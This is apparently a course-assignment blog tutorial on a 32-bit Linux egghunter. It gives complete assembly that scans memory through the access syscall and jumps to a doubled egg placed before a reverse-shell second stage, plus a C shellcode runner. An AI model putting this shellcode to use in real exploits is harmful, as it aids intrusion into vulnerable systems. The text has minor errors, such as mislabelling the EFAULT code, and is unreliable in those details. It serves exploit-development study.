Introduction

An egghunter is a small piece of code, which can be used to scan the process virtual address space, the entire range of virtual addresses that the OS makes available to a process, to find the egg, a bytes sequence defined by the attacker, prepended to the second stage shellcode, which is placed somewhere else at an indeterminate address in the VAS.

Once the egg is found, the egghunter code redirects the flow there, so that the second stage shellcode gets executed.

This technique is often used when the buffer space controlled by the attacker is too small to hold the whole shellcode. In that case, an egghunter can be used as a first stage payload, to search and jump to the second stage payload, placed somewhere else in memory.

Egghunter prototype

Requirements

The egghunter:

  1. must be able to search the entire process VAS, and avoid accessing invalid memory locations, which would cause the program to crash.
  2. must be able to locate the egg sequence in the VAS, and distinguish it from the one in its code.
  3. must be small enough to be stored in the limited space controlled by the attacker.

Access syscall

In order to fulfil the first requirement, we can use the access system call. Below is the function signature from unistd.h:

#include <unistd.h>

int access(
    const char *pathname,   // address of memory page
    int mode                // accessibility checks to be performed (r/w/x)
);

As we can see the access intended functionality is to check users permissions for a specific file, located at *pathname, but we can assign a memory address as the value of the pointer, and use the access syscall to check if a memory page is accessible.

Depending on the return value, we can determine if the memory page can be accessed. When the address we specified is the one of a memory page that can’t be accessed, the return value in EAX will be 0xf2, which is the error code that corresponds to a EFAULT (code: 33 from /usr/include/asm/unistd.h).

When we get a EFAULT we can move directly to the next memory page, which is 4096 bytes ahead. so that we don’t waste time trying to access address in the same page, which would result in a EFAULT as well.

Code optimization

In order to minimize the change of collisions when moving through the process VAS, the egg is usually inserted twice before the second stage shellcode.

Also, instead of using 4 random bytes for the egg, we can use the bytes that correspond to the nop and push <register> instructions, so that once the egghunter finds the egg, it can jump directly to that address.

For instance, we can use 0x90509050 as the egg, which translates to the following assembly instructions:

$ msf-nasm_shell
nasm > nop
00000000  90                nop
nasm > push eax
00000000  50                push eax

By doing so, we can minimize the size of the egghunter, which will be used as first stage payload, because if 4 random bytes are used for the egg, the egghunter code must also calc the offset to land at the beginning of the shellcode placed after the 8 bytes egg sequence.

Egghunter shellcode

Clean registers

The first thing that needs to be done is clearing the registers that will be used later on. In order to avoid null bytes, we can use the xor instruction and XOR each register with itself.

xor eax, eax
xor ecx, ecx
xor edx, edx

Defining the egg

Next we move the 4 byte sequence we decided to use as the egg into ESI

mov esi, 0x90509050     ; 4 byte EGG (nop,push eax,nop,push eax)

Searching for the egg

We start by using the xor operator to avoid null bytes and offset EDX, which we will use as a pointer, so that it points to the first memory address in the page.

next_mempage:
    ; next memory page starts at current position + 4096 bytes
    or dx, 0xfff            ; EDX=EDX+4095

next_byte:
    inc edx                 ; EDX=EDX+1    i.e.= +4096 (start of memory page)

Then we need to:

  • reset EAX and move the code that corresponds to the access syscall into it.
  • move the memory address that we want to check (*pathname pointer) into EBX
  • compare the return value with the one that corresponds to the EFAULT error code (0xf2)
xor eax, eax
mov al, 0x21            ; sys_access call
lea ebx, [edx+8]        ; load address of next 8 bytes
int 0x80
cmp al, 0xf2            ; check if the value returned is EFAULT code

If the value returned in EAX is the EFAULT error code, we can use a jmp instruction to go back to the next_mempage label, and increment EDX by 4096 (next page).

Else, if the address is the one of an accessible memory location, we scan each byte in the page and compare them with the egg.

; if no EFAULT occured, search egg
cmp [edx], esi
jnz next_byte

; if the first 4 bytes corresponds to the egg,
; test the following 4 bytes (egg is repeated twice)
cmp [edx+4], esi
jnz next_byte

Egg found

When the whole 8 byte sequence matches, we can jump to the egg address pointed by EDX, so that the junk NOPs and push operations can be executed as well as the second stage shellcode.

jmp edx

Final shellcode

Below is the complete shellcode for the egghunter:

global _start

section .text
_start:

    ; reset registers
    xor eax, eax
    xor ecx, ecx
    xor edx, edx

    mov esi, 0x90509050     ; 4 byte EGG


next_mempage:
    ; next memory page starts at current position + 4096 bytes
    or dx, 0xfff            ; EDX=EDX+4095

next_byte:
    inc edx                 ; EDX=EDX+1    i.e.= +4096 (start of memory page)
    xor eax, eax
    mov al, 0x21            ; sys_access call
    lea ebx, [edx+8]        ; load address of next 8 bytes
    int 0x80
    cmp al, 0xf2            ; check if the value returned by the access call is EFAULT
    je next_mempage          ; if EFAULT, we can move to next memory page


    ; if no EFAULT occured, search egg
    cmp [edx], esi
    jnz next_byte

    ; if the first 4 bytes corresponds to the egg,
    ; test the following 4 bytes (egg is repeated twice)
    cmp [edx+4], esi
    jnz next_byte

    ; if the egg matches again, we have found the 2nd stage shellcode
    ; so we can jump to it
    jmp edx

Shellcode testing

We are almost done. All that we need to do is compile and link the shellcode using nnasm and ld respectively, then get the instructions opcodes using objdump plus some bash fu and add the opcodes as a string variable to a simple C shellcode runner that passes control to the shellcode.

To hunt the egg we also need to add the egg twice (in reverse), and the reverse shell shellcode as another string variable inside the shellcode runner.

After doing all the above operations, the shellcode runner should look something like this:

#include <stdio.h>
#include <sys/mman.h>
#include <string.h>
#include <unistd.h>

// Egghunter shellcode
const unsigned char code[] = "\x31\xc0\x31\xc9\x31\ [...]";
// EGG + EGG + Reverse Shell shellcode
const unsigned char second_stage[] = "\x50\x90\x50\x90\x50\x90\x50\x90\ [...]";

int main() {
    unsigned char *sc_ptr;
    sc_ptr = (unsigned char *) mmap(0, sizeof(second_stage), PROT_READ|PROT_WRITE|PROT_EXEC, MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);
    memcpy(sc_ptr, second_stage, sizeof(second_stage));
    printf("Shellcode length: %d bytes\n", (int)sizeof(code));
    int (*ret)() = (int(*)())code;
    ret();
}

As always let’s test that everything is working by compiling and running the executable (./run_sc in our case).

Bingo! The egghunter shellcode is just 42 bytes, which is about half the size of the reverse shell shellcode.

The egghunter is able to locate the second stage payload in memory, and jump to that address. The result is as expected a reverse connection to the attacker machine on port 443, with a bash shell.

Wrapping Up

In this post we have discussed the importance of an egghunter when we have to deal with limited buffer to write our shellcode to. As always, if you want to check out the code used to complete this assignmnet, you can refer to the following repository in my Github.

References